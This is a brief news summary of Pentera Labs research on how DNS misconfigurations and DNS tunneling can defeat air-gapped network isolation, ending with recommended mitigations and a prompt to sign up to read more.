Pentera Labs demonstrated how attackers can bypass air-gapped networks by exploiting DNS misconfigurations. Although air-gapped environments are meant to be isolated, many still connect internal DNS servers to public ones, creating hidden pathways. Using DNS tunneling, attackers can exfiltrate data or send commands by encoding messages into DNS queries and responses, overcoming limits with base64, slicing, and obfuscation. Advanced methods like Domain Generation Algorithms make detection harder. Mitigations include using offline DNS servers, filtering suspicious requests, and monitoring anomalies like unusual query volume or oversized packets.

Join for free to read